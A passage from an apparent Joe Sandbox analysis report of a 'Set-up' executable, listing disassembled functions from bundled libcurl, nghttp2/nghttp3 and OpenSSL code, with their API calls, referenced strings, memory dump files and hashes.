
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,00243B19,?,?,?,?,?), ref: 0025671D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000002C,?,?), ref: 0025682B

Strings

curl_ntlm_core.c, xrefs: 0025672F, 00256865
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c, xrefs: 002567FF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c$curl_ntlm_core.c
API String ID: 1622878224-1914695719
Opcode ID: 6e9bcd51306b28470b5f3c0f06a58cd38c60d89b65aa0a751f5a96b1f6531196
Instruction ID: 4069199ad33a2b5348cef4328173bf0fe033c10d7adbcb4d3865c6c727834243
Opcode Fuzzy Hash: 6e9bcd51306b28470b5f3c0f06a58cd38c60d89b65aa0a751f5a96b1f6531196
Instruction Fuzzy Hash: 82417A72A087019BC314DF29C88566BBBF4BFD9301F448A1EF98897351E770D898CB52

Function 00214380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 002143D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00214409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00214457

Strings

curl_addrinfo.c, xrefs: 00214429, 002144C3

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: 5c69de38a8dd3c9985a731ee2fe7a46f95dbf672f5d24c81b710845aeb8030d4
Instruction ID: 6801a9b2e1c6ff81d9bfc7e406fca6a50506cba324abe6a26ef0aae3d4add670
Opcode Fuzzy Hash: 5c69de38a8dd3c9985a731ee2fe7a46f95dbf672f5d24c81b710845aeb8030d4
Instruction Fuzzy Hash: 74418CB5A04746AFD700DF54C880A6AB7E4FFA8314F04852AED898B351E371E9A0DB91

Function 00206650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0020665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0020670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0020671C

Strings

altsvc.c, xrefs: 00206699, 002066AB, 002066BD

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: d6787c01e9b1fcfab059ed10bab5f5821587ece0f5bf0d4712e4c8a44de51836
Instruction ID: 6cbd52608dc324e606fd0b7fc89ba8d76ab3cfec9581b4fad361b7a6672e3826
Opcode Fuzzy Hash: d6787c01e9b1fcfab059ed10bab5f5821587ece0f5bf0d4712e4c8a44de51836
Instruction Fuzzy Hash: 1531CFB1E183016BD700AE20AC86A2B7BD9AB94754F044439FD0996292F776ED288692

Function 002742E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 0027435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 002743EF

Strings

nghttp3_conn.c, xrefs: 00274355, 002743E5
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 0027435A, 002743EA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: cc53d408664b0cf6788622c3f4ee4b73571e193c797580e1342fd718eea71364
Instruction ID: 57fd660b0a831ed4de631c0a2cad6dc3a0a58a1a0db7e22f1bac9e9437990281
Opcode Fuzzy Hash: cc53d408664b0cf6788622c3f4ee4b73571e193c797580e1342fd718eea71364
Instruction Fuzzy Hash: 9731D572420601AFE711AF54EC09F9A37A9FF45319F0944B4F81C9B2A3E776D428CB61

Function 0027A090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,002770DF,00000001,?,?,?), ref: 0027A0E5

Part of subcall function 0027A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 0027A29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,002770DF,00000001,?,?,?), ref: 0027A135

Strings

nghttp3_ksl.c, xrefs: 0027A12B
ksl->head, xrefs: 0027A130

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: 4c949f24dea681cbdca1b2fce956173cecb1960d23541f6d0d96547ab3f70d49
Instruction ID: ff85142b27a52512eeedf7acd1c84e7ced6db6fba39fad4fab10f82b657461d7
Opcode Fuzzy Hash: 4c949f24dea681cbdca1b2fce956173cecb1960d23541f6d0d96547ab3f70d49
Instruction Fuzzy Hash: A2117F702102019FEB149F04D881A6EFBA6FFC9315F58C55AE94D8B682D334DC55CB92

Function 0026E0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 0026E148
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= padlen - 1,nghttp2_frame.c,000004B6,?,?,?,?,00262615,?,?,?,?), ref: 0026E16E

Strings

nghttp2_buf_avail(buf) >= padlen - 1, xrefs: 0026E169
nghttp2_frame.c, xrefs: 0026E164

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assertmemset
String ID: nghttp2_buf_avail(buf) >= padlen - 1$nghttp2_frame.c
API String ID: 1036001119-2332821266
Opcode ID: df0f668960effb815a2c1251a6dadf5d84ead362c745b5d1612ee037147352fe
Instruction ID: 2abf49db4ec5ec521413a9a049db042d42654783f1e73a89e204a34a7dd99924
Opcode Fuzzy Hash: df0f668960effb815a2c1251a6dadf5d84ead362c745b5d1612ee037147352fe
Instruction Fuzzy Hash: 2011E1B5A04B46AFC700CF24D844E05F7A5FF86325F05C259E8584B352D731E868CB90

Function 002985E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00284FE0: memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00284FF9

InitializeCriticalSection.KERNEL32(00000000,00000000), ref: 002985F7
InitializeConditionVariable.KERNEL32(00000000), ref: 00298611
DeleteCriticalSection.KERNEL32(?), ref: 00298634

Strings

`\h, xrefs: 0029863A, 00298656

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CriticalInitializeSection$ConditionDeleteVariablememset
String ID: `\h
API String ID: 1751087644-3807504640
Opcode ID: 4189dab4fecaece5cc883930af403e13f3f99f35d4bcbf69451f4d28d47b9939
Instruction ID: 0d65dd0f861c4ff22489c6ce8f944740f8fc8a5e6e367be4baaa862ad7bdf44d
Opcode Fuzzy Hash: 4189dab4fecaece5cc883930af403e13f3f99f35d4bcbf69451f4d28d47b9939
Instruction Fuzzy Hash: A2019EB5610B018FEB609F78B808B5B77E8BF85750F084428E95ACB291EB31E814EB51

Function 001FC5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 001FC685

Part of subcall function 001D73F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,001DCA95,007EE878,00000467,mprintf.c), ref: 001D741D
Part of subcall function 001D73F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 001D7445

Part of subcall function 001D73F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,001DCA95,007EE878,00000467,mprintf.c), ref: 001D7486
Part of subcall function 001D73F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001D74AA
Part of subcall function 001D73F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D74B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 001FC6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 001FC719

Strings

vtls/vtls.c, xrefs: 001FC653, 001FC69D, 001FC6E7, 001FC72E, 001FC756, 001FC77F, 001FC7A8, 001FC7D1, 001FC7FA, 001FC823, 001FC84C, 001FC875, 001FC935, 001FC95F

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: 659a3f061416e198f022d0c44a4d7a0805b70ef66e84929085f62c13ca0fc6d5
Instruction ID: 07b064fab35baf78983cb747356da3c1a77658eb4d30c792e398a1c1295a6163
Opcode Fuzzy Hash: 659a3f061416e198f022d0c44a4d7a0805b70ef66e84929085f62c13ca0fc6d5
Instruction Fuzzy Hash: 80A171B1B0070BABE7208F25DD45B22B7E8BF54744F084539EA48DB792FB75E8509B90

Function 0035E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0035E9A3

Strings

, xrefs: 0035E992
BN_lshift, xrefs: 0035E7E2
crypto/bn/bn_shift.c, xrefs: 0035E7E9

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: 00234dd27d81751c2d42422f0681bb41f90f5eb664bd28f1d936b1d568a0e109
Instruction ID: 8d43b63e7920bc7861d5bfb7219608ceb0e3c5da5addf77c828d48b3b8652450
Opcode Fuzzy Hash: 00234dd27d81751c2d42422f0681bb41f90f5eb664bd28f1d936b1d568a0e109
Instruction Fuzzy Hash: EA710131A087108BC71ADF29C880A2AF7A5EFDA710F15872EFDA967791D370AD05CB41

Function 002880D0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

Part of subcall function 00288350: strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 002883AD
Part of subcall function 00288350: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 002883C5

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002881FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,?,00283899,?,?), ref: 00288263

Part of subcall function 00284FE0: memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00284FF9

Strings

X\h, xrefs: 0028824A
`\h, xrefs: 002882E8

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy$getenvmemsetstrchr
String ID: X\h$`\h
API String ID: 3532224391-1840809173
Opcode ID: 463fa3337834cf9c81599acc242b0fc9b9a7cc96dc105c2e1af66c237f316607
Instruction ID: 1d1df39354936ffe09478ee1633250e156c02444d0d26973ece4651016b2c24d
Opcode Fuzzy Hash: 463fa3337834cf9c81599acc242b0fc9b9a7cc96dc105c2e1af66c237f316607
Instruction Fuzzy Hash: B861A5B9A293425FEB14EF18D844B2B77D5AF84304F44443DED8987396EA71EC21CB52

Function 003C6590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 003C662C

Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387262
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387285
Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872C5
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872E8

Strings

ocsp_match_issuerid, xrefs: 003C66A9, 003C66E3, 003C675D
crypto/ocsp/ocsp_vfy.c, xrefs: 003C66B3, 003C66ED, 003C6767

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: a287c840ba74adddb5c476236fa3448b53172cdc3362c0a72198cac47f22c50d
Instruction ID: 9b5034d76d7fcea279fd755df19d1dac7745cd716c145443b9cce331ff681a08
Opcode Fuzzy Hash: a287c840ba74adddb5c476236fa3448b53172cdc3362c0a72198cac47f22c50d
Instruction Fuzzy Hash: 0A4106A5A443013BEA1276702C87F6B31499F5575CF240938FE19EE2C3FA65DE2483A7

Function 00258130 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000010,?,?,?,?,?,?,007F9781,?), ref: 002581A3
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?,?,?,?,?,?,?,?,007F9781,?), ref: 002581BD
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 0025822A

Strings

dynhds.c, xrefs: 0025817B, 002581FE, 00258232, 00258265

Memory Dump Source

